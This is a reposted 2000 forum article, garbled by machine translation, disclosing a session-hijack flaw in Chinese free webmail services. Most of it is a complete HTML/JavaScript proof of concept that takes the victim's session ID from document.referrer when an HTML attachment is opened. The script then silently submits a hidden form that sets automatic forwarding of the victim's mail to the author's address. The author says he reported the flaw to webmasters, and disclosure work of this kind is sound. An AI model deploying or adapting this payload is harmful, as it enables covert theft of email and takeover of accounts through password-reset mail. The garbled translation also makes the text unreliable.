"There is currently a safe vulnerability in some free email in China."

zhaozj2021-02-08  268

The Script originated from the previous century (1999) once in setting up a long string URL when setting up free email ...

After reading this article, you should hurry to check if you have an email address in your email: = (

It is best not to open the HTML file sent by others ...

We know, the certifications after the domestic free Email user login is a long string URL (as I use shelltools.

After the record is "http://webmail.****.com/shelltools/3s91091u96kdwcgnkojf4vumxajfhn/signon.gen")

And the control IP address saved by the server is done, after logging in, seeing emails, change personal information, parameter settings, mail signature, recipient assistants

And automatic forwarding, etc., relies on this random ID: 3s91091u96kdwcgnkojf4vumxajfhn confirmed, while users receive a letter in web way and view you

When you give him (her) HTML accessories, you can get the previous URL of "Document.referre", which is a string of the ID of the ID.

His (her) IP is consistent with the control IP of the server, then gets these two premises, smart, you can know that the people who don't have a good idea can pass

This way makes those hands and happiness: = (, the following Script demo implementation is set to "shellTools@21cn.com" (specific

It is the Demo you have made by the free email. ~) If he has received the HTML attachment, his automatic forwarding is added, then his

Mail .... By the way, like OICQ, etc., some websites, such as OICQ, send your registration password back to your mailbox ...

It's time to finish, then look at the code, what, don't understand? ... What are you doing here? ....

(This method can be passed so far, but I have given this article to email to email's Webmaster, when is it blocked?

I no longer know. )

----- Learn someone, "Reprint, please indicate the source" ~

Shell (shelltools@21cn.com) http://shelltools.yeah.net

2000/6/14

Be careful with web way </ title></p> <p></ HEAD></p> <p><Body></p> <p>Net management, hello:</p> <p>**** Automatic forwarding operations There are some security issues, using it in Email users <br></p> <p>Simple JavaScript can be used in "Automatic Forward" when viewing letters.</p> <p>Fill in other addresses to other addresses to other mailboxes. Please check the original code in this page <br></p> <p>Script. This problem exists in several free Email in China. <br></p> <p>(If you are using the web way to see this email please to configure -> Automatic forwarding, <br></p> <p>It should be set to "shelltools@21cn.com")</p> <p>**** User Shell</p> <p><Form method = "post" action = "autoforward.gen" name = adduserform target = "shelltools"></p> <p><Input Type = Hidden Name = Suuser Value =></p> <p><Input Type = Hidden Name = Request Value = EditDone></p> <p><Input Type = Hidden Name = "B1" Value = "Update"></p> <p><Input Type = Hidden Name = "Forwardaddresses" Value = "shelltools@21cn.com"> </ form></p> <p><Script language = jscript></p> <p>Var Sr = Document.referRer;</p> <p>VAR ISR;</p> <p>SR = sr.substring (7, 30);</p> <p>ISR = sr.indexof ("/");</p> <p>SR = "http: //" sr.substring (0, ISR) "/banner.htm";</p> <p>Var Sr2 = Document.referre;</p> <p>ISR = sr2.indexof ("readmiscpart");</p> <p>IF (ISR> 20) {</p> <p>AW = WINDOW.OPEN ("About: Blank", "Banner1", "Width = 500, Height = 60, Resizable = NO, Menubar = no, scrollbars = no");</p> <p>AW.Document.write ('<html>');</p> <p>AW.Document.write ('<head>');</p> <p>AW.Document.write ('<title> settings Automatic Forward </ TITLE>');</p> <p>AW.Document.write ('</ head>');</p> <p>AW.Document.write ('<frameset frameespace = 0 rows = 97%, * frameborder = no border = false>');</p> <p>AW.Document.write ('<frame name = show src =' sr 'scrolling = no>');</p> <p>AW.Document.write ('<frame name = shelltools src = main.asp scrolling = no>');</p> <p>AW.Document.write ('<noframes>');</p> <p>AW.Document.write ('<body>');</p> <p>AW.Document.write ('<p> this page buys frames, but your browser doesnt support the "); </ p>');</p> <p>AW.Document.write ('</ body>');</p> <p>AW.Document.write ('</ NOFRAMES>');</p> <p>AW.Document.write ('</ frameset>');</p> <p>AW.Document.write ('</ html>');</p> <p>SR2 = sr2.substring (0, ISR);</p> <p>Document.adduserform.Action = SR2 "AutoForward.gen";</p> <p>Document.adduserform.submit ();</p> <p>WINDOW.FOCUS ();</p> <p></ Script></p> <p></ Body></p> <p></ Html></p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-1339.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="1339" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.037</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'kNLzyw7yKRFdeY5H9WC5E8KZzlIuVlMyVm6rVDCQQ85C9dWIVxTWJCmosOKiA20LOmKG8c3_2Bi9imapi_2FPe_2Fbpw_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>